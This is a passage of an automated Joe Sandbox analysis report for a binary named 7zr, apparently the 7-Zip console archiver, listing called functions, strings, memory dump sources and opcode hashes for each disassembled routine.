                                        • Instruction Fuzzy Hash: 9512103090464A9FDF26DFA8C889BEEBFB5BF85304F04045DE44657292DB74BA88CB51
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E4E8F
                                          • Part of subcall function 005A965D: VariantClear.OLEAUT32(?), ref: 005A967F
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ClearH_prologVariantfree
                                        • String ID: file
                                        • API String ID: 904627215-2359244304
                                        • Opcode ID: 3273363402f97c1f0b27c247df50ae1db3d7d8446e672fd6065821c2df0c80f8
                                        • Instruction ID: 14144faaf3da69980a2c4c9e92b7a3a7f40eb1bf7e1168b75b40abaf4a6cb66d
                                        • Opcode Fuzzy Hash: 3273363402f97c1f0b27c247df50ae1db3d7d8446e672fd6065821c2df0c80f8
                                        • Instruction Fuzzy Hash: F212C33490064ADFCF15EFA5C989ADDBFB6BF85344F204068F545AB292DB32AE45CB10
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C2CE0
                                          • Part of subcall function 005A5E10: __EH_prolog.LIBCMT ref: 005A5E15
                                          • Part of subcall function 005B41EC: _CxxThrowException.MSVCRT(?,00654A58), ref: 005B421A
                                          • Part of subcall function 005A965D: VariantClear.OLEAUT32(?), ref: 005A967F
                                        Strings
                                        • Cannot create output directory, xrefs: 005C3070
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ClearExceptionThrowVariant
                                        • String ID: Cannot create output directory
                                        • API String ID: 814188403-1181934277
                                        • Opcode ID: df4798bb3c4b395fb38b25c34a311f94fed6476cd710c8768c3aec242259a7fa
                                        • Instruction ID: 1f6c955a0f0bf0a0ab8f346cdac457f3f5e0972539556f90112082c66456bd1b
                                        • Opcode Fuzzy Hash: df4798bb3c4b395fb38b25c34a311f94fed6476cd710c8768c3aec242259a7fa
                                        • Instruction Fuzzy Hash: 3EF18C3190028AAFCF25EFE4C895AEDBFB5BF59300F1440ADE48567252DB31AE49CB51
                                        APIs
                                        • fputs.MSVCRT ref: 005DC840
                                          • Part of subcall function 005A25CB: _CxxThrowException.MSVCRT(?,00654A58), ref: 005A25ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionThrowfputs
                                        • String ID:
                                        • API String ID: 1334390793-399585960
                                        • Opcode ID: 642eb3c316b78a4664b6b4f1d58577cd108f29339c22c7bb1c03730d38d5dec5
                                        • Instruction ID: 8b0f4463a556cf13dd056400139773f581a4eb01b16615191ae774e21f8b97ec
                                        • Opcode Fuzzy Hash: 642eb3c316b78a4664b6b4f1d58577cd108f29339c22c7bb1c03730d38d5dec5
                                        • Instruction Fuzzy Hash: 0F119D716047459FDB25CF5DC8D5BAABFE6FF8A304F14446EE1868B251C7B1A804CB60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: Open
                                        • API String ID: 1795875747-71445658
                                        • Opcode ID: 19dacc82524a4ecfed83455050f67d582e0bf3a152bc2417e4544b57214f0229
                                        • Instruction ID: 39fb5228250064dbe930a05175a68ba14c5514032dcdc2d66eaea23002920fde
                                        • Opcode Fuzzy Hash: 19dacc82524a4ecfed83455050f67d582e0bf3a152bc2417e4544b57214f0229
                                        • Instruction Fuzzy Hash: 21119E36101B049FC720EF78E996ADABFA2FF55310F40852FE19A83212DA71A904CF60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B58C3
                                          • Part of subcall function 005A6C72: __EH_prolog.LIBCMT ref: 005A6C77
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 8028838d16d41bf54d0ece6040f98776eefdae5cee3fcadabc28c859dc68088e
                                        • Instruction ID: 899bc291446fbe1ea319eb38b32205907afc9bafbc3aba1351baf71dbf16dff1
                                        • Opcode Fuzzy Hash: 8028838d16d41bf54d0ece6040f98776eefdae5cee3fcadabc28c859dc68088e
                                        • Instruction Fuzzy Hash: 0791F43590090ADFCF29EBA4C886BEEBFB6FF85340F144469E542A7251EB316D44CB61
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005F06B3
                                        • _CxxThrowException.MSVCRT(?,0065D480), ref: 005F08F2
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$H_prologmalloc
                                        • String ID:
                                        • API String ID: 3044594480-0
                                        • Opcode ID: 848b3911d69b0184a59bd4c78d7b526500392a31690f29190e1ac5226bec9c3c
                                        • Instruction ID: d48911243a93f0265fbd30652ffcfdd8d53a5e1a088b19f04e8c99318d8106b9
                                        • Opcode Fuzzy Hash: 848b3911d69b0184a59bd4c78d7b526500392a31690f29190e1ac5226bec9c3c
                                        • Instruction Fuzzy Hash: 58914774900249DFCF21DFA9C885AEEBFB5BF49344F144099E545A3292CB34AE45CFA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: d662f1000dd447dfb2da9dbd1944a7dfea7e4bdc88f7cb2e9939a6276c5fdd5f
                                        • Instruction ID: 3d00d1c3cd66500208bbad2304da272e07326bc384f03d8b98d3e489b778659f
                                        • Opcode Fuzzy Hash: d662f1000dd447dfb2da9dbd1944a7dfea7e4bdc88f7cb2e9939a6276c5fdd5f
                                        • Instruction Fuzzy Hash: B1519F74508B449FDB25CF64C490AEABFF2BF89300F18889DE4D64B202C730B984DB50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C7B4D
                                        • memcpy.MSVCRT(00000000,006627DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 005C7C65
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prologmemcpy
                                        • String ID:
                                        • API String ID: 2991061955-0
                                        • Opcode ID: f5449cf6298dfac3a5dc2d71b041d737ec0d8425f10887c02fe25039d96ffae9
                                        • Instruction ID: 30dbb30bafd8524e5532cd22f70cb1d77a59a6d201296cbb766be2a35d095c2e
                                        • Opcode Fuzzy Hash: f5449cf6298dfac3a5dc2d71b041d737ec0d8425f10887c02fe25039d96ffae9
                                        • Instruction Fuzzy Hash: AD41687090461A9FCB20EFA4C959FEEBBB5BF48304F10441DE442A3692DB31AE09CF51
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005F1516
                                          • Part of subcall function 005F10D3: __EH_prolog.LIBCMT ref: 005F10D8
                                        • _CxxThrowException.MSVCRT(?,0065D480), ref: 005F1561
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrow
                                        • String ID:
                                        • API String ID: 2366012087-0
                                        • Opcode ID: af8ad4e588a8eea681a88c8aadb4be3bc580e9700f1d74ec166f6f511110e78c
                                        • Instruction ID: 232c5dc216dd5f9386b484b48de225733be3747e551f88962a5e5bded9450553
                                        • Opcode Fuzzy Hash: af8ad4e588a8eea681a88c8aadb4be3bc580e9700f1d74ec166f6f511110e78c
                                        • Instruction Fuzzy Hash: B301F272500248EFDF118F94C815BEFBFB9FF813A0F04405AF5455B111C7B9A9558BA4
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D5800
                                        • fputs.MSVCRT ref: 005D5830
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prologfputcfputsfree
                                        • String ID:
                                        • API String ID: 195749403-0
                                        • Opcode ID: 257429a377f427de11153e7ef0cec15b52d6e0c33f465ec4bebe039c64e6cd86
                                        • Instruction ID: cd29163fcecc47b8656a4fb3f6104ef47055f2ace544bbb21f0366d71b20a205
                                        • Opcode Fuzzy Hash: 257429a377f427de11153e7ef0cec15b52d6e0c33f465ec4bebe039c64e6cd86
                                        • Instruction Fuzzy Hash: FDF0BE32800415CFCB16AB98E4067DEBFB2FF45310F00442AE402A35A1CB305941CB88
                                        APIs
                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 005A952C
                                        • _CxxThrowException.MSVCRT(?,006555B8), ref: 005A954A
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AllocExceptionStringThrow
                                        • String ID:
                                        • API String ID: 3773818493-0
                                        • Opcode ID: bc1540757d6c20f14260c7a94d02a63995a603fb89528315c7089f269d8c9a5d
                                        • Instruction ID: 06b430b903339f96e2cb191559158dd17f93b0987b2fc668696ee2c562cbe437
                                        • Opcode Fuzzy Hash: bc1540757d6c20f14260c7a94d02a63995a603fb89528315c7089f269d8c9a5d
                                        • Instruction Fuzzy Hash: 24F065716103149BC750EF94D859D8B7BEDFF06350B40842AF945CB310E770E80087D0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$fputc
                                        • String ID:
                                        • API String ID: 1185151155-0
                                        • Opcode ID: c9887dbd6fae9c67dde8de8def416d53aedabf5e7867b69e5bd80c79d1f07d52
                                        • Instruction ID: c08eac6aa60796acfbac9ab3f280905500b7ffc1c30c070f0e465f384e082c85
                                        • Opcode Fuzzy Hash: c9887dbd6fae9c67dde8de8def416d53aedabf5e7867b69e5bd80c79d1f07d52
                                        • Instruction Fuzzy Hash: 72E08C3B20A210AFA7266B48BC018582BD7EBCA362326002BE64093360AB132C155AA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorLast_beginthreadex
                                        • String ID:
                                        • API String ID: 4034172046-0
                                        • Opcode ID: a674bc14d71aa15d114830d23ab0fe73db8dd649ba8fe5fd74caf0189d45f5e1
                                        • Instruction ID: a38efa45455d665811d6aadc38468d4f538b847dabcea7b50a337aba3842f826
                                        • Opcode Fuzzy Hash: a674bc14d71aa15d114830d23ab0fe73db8dd649ba8fe5fd74caf0189d45f5e1
                                        • Instruction Fuzzy Hash: 52E0C2F62092026BF3209B60CC02FB7729DEBA0B40F40847DFA45C6280E661CD00C7F5
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,005A9C6E), ref: 005A9C52
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 005A9C59
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: 7e17941c7aee1f1ad037cc6374887f13e04e790baa266b9dbd6ff1a08bfa97bf
                                        • Instruction ID: b2100f226f1aeedfdb2cbf950dec9870b9c9fb6143063dd8575def05a330de83
                                        • Opcode Fuzzy Hash: 7e17941c7aee1f1ad037cc6374887f13e04e790baa266b9dbd6ff1a08bfa97bf
                                        • Instruction Fuzzy Hash: 3FB012BA401100FFDF649BB0DD0CC163B2DEA067113005644F109C2110C637C045CB70
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 005AB843
                                        • GetLastError.KERNEL32 ref: 005AB8AA
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorLastmemcpy
                                        • String ID:
                                        • API String ID: 2523627151-0
                                        • Opcode ID: babf497370df34f0e078accfc38b5f678389ee4a9bc1e4b867779d0c20da6485
                                        • Instruction ID: f696a2ad9972dd989b8f07ca9baed3c7957bf7420d867d8c7c07505e0b2edcb6
                                        • Opcode Fuzzy Hash: babf497370df34f0e078accfc38b5f678389ee4a9bc1e4b867779d0c20da6485
                                        • Instruction Fuzzy Hash: BB813D71A007069FEB64CF29C980A6EBBF6FF86314F14492DE84687A42D774F945CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 2436765578-0
                                        • Opcode ID: 88de14ddeb27052784d36721dc1d5720367689a1d9334c89efc85a64540437c9
                                        • Instruction ID: 73ebc53cb2aae8a8918dbc28c4384c1f6ca02868f9c6bcb596c95d8554a02887
                                        • Opcode Fuzzy Hash: 88de14ddeb27052784d36721dc1d5720367689a1d9334c89efc85a64540437c9
                                        • Instruction Fuzzy Hash: 20E08C3400424CAACF105FA0D80479C3FAD6B023A9F00A015FC088E211C670C6D48748
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: b6f8455a770840f2c916c048440cc284a71637e65875b7b7ab0bc5daa03a28f0
                                        • Instruction ID: ca1622706c33b101dc82c96176f3abf8c372be6170e66d6e5054971d7fbbb4c8
                                        • Opcode Fuzzy Hash: b6f8455a770840f2c916c048440cc284a71637e65875b7b7ab0bc5daa03a28f0
                                        • Instruction Fuzzy Hash: 3B52C370904289DFEF19CFA9C588BAEBFB5BF49305F184099E885AB291C771DE41CB11
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 0b0ce10772b039df12e192bfec86aaf028ef5c2b3861b9e8e924460f8a8fd54e
                                        • Instruction ID: 0dcd23e49efaa2289a5b1dcc2687f72d30b09efcb00bbfae92bdc54646d38846
                                        • Opcode Fuzzy Hash: 0b0ce10772b039df12e192bfec86aaf028ef5c2b3861b9e8e924460f8a8fd54e
                                        • Instruction Fuzzy Hash: ABF198709047859FCF31CF64C494AEABFE1BF59304F58486EE49A8B251DB34B984CB51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: bb76eb190fe0873b16ca2f30faa2864117c66120aab378e19426ee252f6330a7
                                        • Instruction ID: 3b361ea40be3771c41dff612c2c2d30375d6e35d259253eeab374e1b900af56d
                                        • Opcode Fuzzy Hash: bb76eb190fe0873b16ca2f30faa2864117c66120aab378e19426ee252f6330a7
                                        • Instruction Fuzzy Hash: 42D18C70A04A4ADFDF28CFA5C884BEEBFB1BF48300F10492DE65597691D779A844CB94
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005ECF96
                                          • Part of subcall function 005F1511: __EH_prolog.LIBCMT ref: 005F1516
                                          • Part of subcall function 005F1511: _CxxThrowException.MSVCRT(?,0065D480), ref: 005F1561
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrow
                                        • String ID:
                                        • API String ID: 2366012087-0
                                        • Opcode ID: 8386afe2303202931b9091bc32eedd926a4b0ba48e9ab522cdea1fde92021df3
                                        • Instruction ID: 1c0d85e294dbfdbf5ea816ac22e5df2b3831740beae48fb2b3e23c552bc30832
                                        • Opcode Fuzzy Hash: 8386afe2303202931b9091bc32eedd926a4b0ba48e9ab522cdea1fde92021df3
                                        • Instruction Fuzzy Hash: 1C516171900289DFCB15CFA8C8C8BAEBBB5BF49304F18449DE89AD7242D7759E45CB21
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 990a41d0ed29f8a0abfd0dbabc7ce8769d3f52b83f7b08778d2cc50d45e2a1b2
